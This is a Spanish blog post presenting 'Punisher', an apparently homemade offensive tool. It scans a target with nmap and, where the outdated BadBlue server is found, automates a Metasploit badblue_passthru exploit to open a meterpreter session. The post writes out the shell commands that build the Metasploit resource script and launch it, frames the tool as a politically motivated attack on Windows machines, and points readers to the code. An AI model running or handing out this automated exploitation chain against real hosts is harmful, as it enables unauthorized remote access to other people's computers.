sábado, 23 de febrero de 2019

Punisher. Un tool para terminar con la propiedad privada de Windows

Me he enganchado a la serie de "The Punisher" de Netflix, y cuando me engancho a una serie o veo una película, por lo general, siempre se me suele ocurrir una idea para una tool o un ataque basada en la serie o película (o canciones también). Y así ha sido.



Punisher se caracteriza por hacer buscar el bien aunque para eso tenga que matar. Por ejemplo, para terminar con la corrupción del Ejército Americano, ve bien matar a quien haga falta para limpiar el mundo. The Punisher, conocido también como Frank Castle, es bastante efectivo; por lo que el cuerpo me pedía crear una tool así.

Y así ha sido, he creado una tool que implementa nmap para realizar un scaneo sencillo de un equipo que especifiquemos y obtiene sus puertos abiertos. Esto nos va a servir para ver a qué puerto se le podría atacar. Entre una de las muchas cosas que hace, busca por si encuentra a BadBlue (enemigo de los rojos) y ver si puede aprovechar esta desactualización de sus sistemas para acceder mediante una sesión meterpreter.

Para esto he tenido que hacer uso de las siguientes instrucciones
echo use exploit/windows/http/badblue_passthru >> metasploit.rc
echo "set RHOST $punisher" >> metasploit.rc
echo "set PAYLOAD windows/meterpreter/bind_tcp" >> metasploit.rc 
echo "exploit" >> metasploit.rc
msfconsole -r metasploit.rc


Es bastante simple, ya que tan solo hacemos echo [Instrucción para Metasploit] y lo redirigimos a un archivo .rc que posteriormente utilizaremos para iniciar msfconsole con -r y el archivo que hemos ido creando.

Eso mismo es lo que he hecho posteriormente para automatizar el proceso de Hackear un Windows mediante un archivo malicioso. Como veis no es más que automatizar procesos que ya conté hace más de 1 año en el blog y por supuesto, enfocado en atacar al enemigo, Microsoft, para que así terminemos con la propiedad privada de los medios de producción a nivel de informática.

Para el código tendréis que esperar un poco a que esté del todo terminada, ya que las pruebas que he hecho han sido sobre una máquina virtual y ahora mismo estoy en proceso de cambiar de ordenador dado que el mío ya resiste poco más la caña que le doy y he tenido algunos problemas.

Por el momento os dejo la tool en lo que sería su versión Beta, pero porque hay veces que ha funcionado y otras que no, aunque los fallos han sido al iniciar Metasploit, no de código; aunque por eso quiero hacer más pruebas. No obstante, si queréis ver el código para echarle un vistazo o mejorarlo, aquí lo tenéis en mi repositorio de GitHub.



Cuando tenga las mejoras y lo haya testeado más os avisaré, aunque mientras tanto podéis ver algunas pruebas que estuve haciendo y que subí a mi cuenta de Twitter.


¿Hackeamos el Mundo?

No hay comentarios:

Publicar un comentario

Related Posts Plugin for WordPress, Blogger...

Entrada destacada

El server me sabe a poco.

Soy un fanático del Rock y de Debian . (Creo que voy a inventar Rockbian, que suena bien y todo xD) Llevaba tiempo queriendo unir estos 2 c...